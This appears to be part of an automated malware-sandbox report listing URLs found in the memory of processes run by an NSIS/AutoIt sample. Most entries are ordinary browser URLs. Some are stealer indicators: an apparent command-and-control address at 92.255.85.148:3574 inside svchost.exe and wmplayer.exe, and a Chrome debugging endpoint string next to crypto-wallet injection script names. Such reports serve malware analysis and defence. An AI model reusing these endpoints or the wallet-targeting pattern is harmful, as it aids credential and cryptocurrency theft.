                      Source: wmplayer.exe, 00000023.00000003.2136103443.0000021AB31AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:%u/json/list?t=%uws:exodus.jsExodusatomic.jsAtomicguarda.jsGuardainfinity.jsInfinit
                      Source: chrome.exe, 00000013.00000002.1873044462.0000111C00238000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1879874275.0000422C00A54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1883994313.0000594000238000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1873611916.0000111C002FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:8000/254d3199/14c90ac5
                      Source: chrome.exe, 00000013.00000002.1879409281.0000422C009D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:8000/254d3199/14c90ac50(p
                      Source: chrome.exe, 00000013.00000002.1883994313.0000594000238000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:8000/254d3199/14c90ac5Y
                      Source: chrome.exe, 00000013.00000002.1881895202.0000422C00D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:8000/254d3199/14c90ac5inFrame
                      Source: chrome.exe, 00000013.00000002.1881895202.0000422C00D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:8000/254d3199/14c90ac5ination
                      Source: chrome.exe, 00000013.00000002.1881895202.0000422C00D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:8000/254d3199/14c90ac5ppend
                      Source: chrome.exe, 00000013.00000002.1881895202.0000422C00D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:8000/254d3199/14c90ac5yPolicy
                      Source: msedge.exe, 00000016.00000002.1897055121.000001E2500A1000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000016.00000002.1898819277.0000198C00210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:8000/254d3199/72f3a0b3
                      Source: msedge.exe, 00000016.00000002.1907439155.0000630C00234000.00000004.00001000.00020000.00000000.sdmp, msedge.exe, 00000016.00000002.1908578577.0000630C0024C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:8000/254d3199/72f3a0b3c
                      Source: msedge.exe, 00000016.00000002.1897015790.000001E25008C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:8000/254d3199/72f3a0b3es
                      Source: svchost.exe, 0000000F.00000003.1992811813.000001C278646000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.01:
                      Source: chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6878
                      Source: chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6929
                      Source: chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6953
                      Source: chrome.exe, 00000013.00000002.1877887664.0000422C0062C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036
                      Source: chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7047
                      Source: chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7172
                      Source: chrome.exe, 00000013.00000002.1877723507.0000422C005A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279
                      Source: chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7370
                      Source: chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7406
                      Source: chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488
                      Source: chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553
                      Source: chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
                      Source: chrome.exe, 00000013.00000002.1877723507.0000422C005A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
                      Source: chrome.exe, 00000013.00000002.1877723507.0000422C005A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
                      Source: chrome.exe, 00000013.00000002.1877723507.0000422C005A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
                      Source: chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
                      Source: chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
                      Source: chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
                      Source: chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/82296
                      Source: chrome.exe, 00000013.00000002.1877723507.0000422C005A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
                      Source: chrome.exe, 00000013.00000002.1876010025.0000422C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clients2.google.com/time/1/current
                      Source: chrome.exe, 00000013.00000002.1877723507.0000422C005A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
                      Source: HI6VIJERUn.exe, 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
                      Source: HI6VIJERUn.exe, 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                      Source: HI6VIJERUn.exe, 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                      Source: HI6VIJERUn.exe, 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
                      Source: chrome.exe, 00000013.00000002.1877767613.0000422C005E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://developer.chrome.com/extensions/external_extensions.html)
                      Source: svchost.exeString found in binary or memory: http://go.micr
                      Source: chrome.exe, 00000013.00000002.1875052211.0000422C0009E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://google.com/
                      Source: chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
                      Source: HI6VIJERUn.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                      Source: HI6VIJERUn.exe, 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                      Source: HI6VIJERUn.exe, 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
                      Source: HI6VIJERUn.exe, 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                      Source: chrome.exe, 00000013.00000002.1879088256.0000422C008F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certs
                      Source: HI6VIJERUn.exe, 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                      Source: HI6VIJERUn.exe, 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
                      Source: chrome.exe, 00000013.00000002.1879372254.0000422C009B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://unisolated.invalid/
                      Source: Hop.comString found in binary or memory: http://www.autoitscript.com/autoit3/
                      Source: Hop.com, 0000000A.00000000.1481481554.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp, Hop.com, 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp, Hop.com, 0000000E.00000002.1684720884.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/X
                      Source: chrome.exe, 00000013.00000002.1879441086.0000422C009E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.gstatic.com/generate_204
                      Source: svchost.exe, 0000000F.00000002.2232402260.000001C2785AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2117817268.000001C2785ED000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1918863263.000001C2785AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1829154317.000001C2785AD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1957049013.000001C2785D4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2232502540.000001C2785ED000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1956648960.000001C2785B3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2230849858.000000B604EBC000.00000004.00000010.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2183093337.000001C2785BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1957374161.000001C2785EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2231737197.000001C276305000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000023.00000002.2691862439.0000021AB33E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://92.255.85.148:3574/b3ad89898301a3d857946a/qb6h1inb.gr7dt
                      Source: svchost.exe, 0000000F.00000002.2232402260.000001C2785AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1918863263.000001C2785AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1829154317.000001C2785AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://92.255.85.148:3574/b3ad89898301a3d857946a/qb6h1inb.gr7dti
                      Source: svchost.exe, 0000000F.00000003.1860719211.000001C278678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: chrome.exe, 00000013.00000002.1878349012.0000422C006EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.ico
                      Source: svchost.exe, 0000000F.00000003.1860719211.000001C278678000.00000004.00000020.00020000.00000000.sdmp, Web Data.25.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: chrome.exe, 00000013.00000002.1881000420.0000422C00BE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search
                      Source: chrome.exe, 00000013.00000002.1881000420.0000422C00BE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
                      Source: chrome.exe, 00000013.00000002.1881000420.0000422C00BE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
                      Source: svchost.exe, 0000000F.00000003.1860719211.000001C278678000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877723507.0000422C005A4000.00000004.00000800.00020000.00000000.sdmp, Web Data.25.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: chrome.exe, 00000013.00000002.1876602417.0000422C00328000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000002.1902875706.0000341C00020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                      Source: chrome.exe, 00000013.00000002.1877723507.0000422C005A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore206E5
                      Source: msedge.exe, 00000016.00000002.1902875706.0000341C00020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore4
                      Source: chrome.exe, 00000013.00000002.1879180867.0000422C0093C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1879409281.0000422C009D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en-GB
                      Source: chrome.exe, 00000013.00000002.1878221252.0000422C006BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en-GBWeb
                      Source: chrome.exe, 00000013.00000003.1860050167.0000422C00C88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1875436417.0000422C00108000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1880032931.0000422C00A7B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1878881660.0000422C00874000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858747770.0000422C00C88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1881369455.0000422C00CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1876141419.0000422C00284000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1882738549.0000422C00E78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1876602417.0000422C00328000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
                      Source: chrome.exe, 00000013.00000002.1876010025.0000422C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
                      Source: chrome.exe, 00000013.00000002.1876010025.0000422C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
                      Source: chrome.exe, 00000013.00000002.1874625312.0000422C00013000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000002.1902875706.0000341C00020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/
                      Source: chrome.exe, 00000013.00000002.1875915640.0000422C001AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/
                      Source: chrome.exe, 00000013.00000002.1875915640.0000422C001AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/_
                      Source: svchost.exe, 0000000F.00000003.1946419398.000001C2786D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1957491403.000001C278604000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1945605573.000001C2786D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1982760478.000001C278693000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1845200465.00005940002E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1845157006.00005940002D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
                      Source: chrome.exe, 00000013.00000002.1877723507.0000422C005A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1878319689.0000422C006DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877687874.0000422C00584000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877887664.0000422C0062C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1875915640.0000422C001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1881000420.0000422C00BE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1874625312.0000422C00013000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1867514158.0000007DE9BFD000.00000004.00000010.00020000.00000000.sdmp, msedge.exe, 00000016.00000002.1902938664.0000341C00040000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.32.drString found in binary or memory: https://clients2.google.com/service/update2/crx
                      Source: chrome.exe, 00000013.00000002.1881000420.0000422C00BE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx0
                      Source: chrome.exe, 00000013.00000002.1875682617.0000422C0014C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod
                      Source: chrome.exe, 00000013.00000002.1877687874.0000422C00584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxB
                      Source: chrome.exe, 00000013.00000002.1875915640.0000422C001AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync
                      Source: chrome.exe, 00000013.00000002.1875915640.0000422C001AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync/event
                      Source: chrome.exe, 00000013.00000002.1877723507.0000422C005A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1880582584.0000422C00AD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
                      Source: svchost.exe, 0000000F.00000003.1694519028.000001C2763A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudflare-dns.com/dns-query
                      Source: svchost.exe, 0000000F.00000003.1694519028.000001C2763A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudflare-dns.com/dns-queryMachineGuidSOFTWARE
                      Source: manifest.json0.32.drString found in binary or memory: https://docs.google.com/
                      Source: chrome.exe, 00000013.00000002.1878579894.0000422C00798000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877240234.0000422C00444000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1878623270.0000422C007B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
                      Source: chrome.exe, 00000013.00000002.1878579894.0000422C00798000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877240234.0000422C00444000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1878623270.0000422C007B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
                      Source: chrome.exe, 00000013.00000002.1878579894.0000422C00798000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877240234.0000422C00444000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1878623270.0000422C007B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
                      Source: chrome.exe, 00000013.00000002.1878409482.0000422C00710000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877373539.0000422C00494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
                      Source: chrome.exe, 00000013.00000002.1878409482.0000422C00710000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877373539.0000422C00494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
                      Source: manifest.json0.32.drString found in binary or memory: https://drive-autopush.corp.google.com/
                      Source: manifest.json0.32.drString found in binary or memory: https://drive-daily-0.corp.google.com/
                      Source: manifest.json0.32.drString found in binary or memory: https://drive-daily-1.corp.google.com/
                      Source: manifest.json0.32.drString found in binary or memory: https://drive-daily-2.corp.google.com/
                      Source: manifest.json0.32.drString found in binary or memory: https://drive-daily-3.corp.google.com/
                      Source: manifest.json0.32.drString found in binary or memory: https://drive-daily-4.corp.google.com/
                      Source: manifest.json0.32.drString found in binary or memory: https://drive-daily-5.corp.google.com/
                      Source: manifest.json0.32.drString found in binary or memory: https://drive-daily-6.corp.google.com/
                      Source: manifest.json0.32.drString found in binary or memory: https://drive-preprod.corp.google.com/
                      Source: manifest.json0.32.drString found in binary or memory: https://drive-staging.corp.google.com/
                      Source: manifest.json0.32.drString found in binary or memory: https://drive.google.com/
                      Source: chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1878349012.0000422C006EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1878785063.0000422C00834000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
                      Source: chrome.exe, 00000013.00000002.1878785063.0000422C00834000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=searchTerms
                      Source: chrome.exe, 00000013.00000002.1881066611.0000422C00C0C000.00000004.00000800.00020000.00000000.sdmp, Web Data.25.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: svchost.exe, 0000000F.00000003.1860719211.000001C278678000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1880928007.0000422C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1878349012.0000422C006EC000.00000004.00000800.00020000.00000000.sdmp, Web Data.25.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: chrome.exe, 00000013.00000002.1880928007.0000422C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1878349012.0000422C006EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.ico
                      Source: svchost.exe, 0000000F.00000003.1860719211.000001C278678000.00000004.00000020.00020000.00000000.sdmp, Web Data.25.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: svchost.exeString found in binary or memory: https://go.mic
                      Source: svchost.exeString found in binary or memory: https://go.microso
                      Source: msedge.exe, 00000016.00000002.1905572634.0000341C002C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                      Source: chrome.exe, 00000013.00000002.1875915640.0000422C001AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/googleapis.com
                      Source: chrome.exe, 00000013.00000002.1877687874.0000422C00584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleusercontent.com/
                      Source: chrome.exe, 00000013.00000002.1877687874.0000422C00584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleusercontent.com/cr_components/page_image_service/page_image_service.mojom-webui.js
                      Source: chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
                      Source: chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
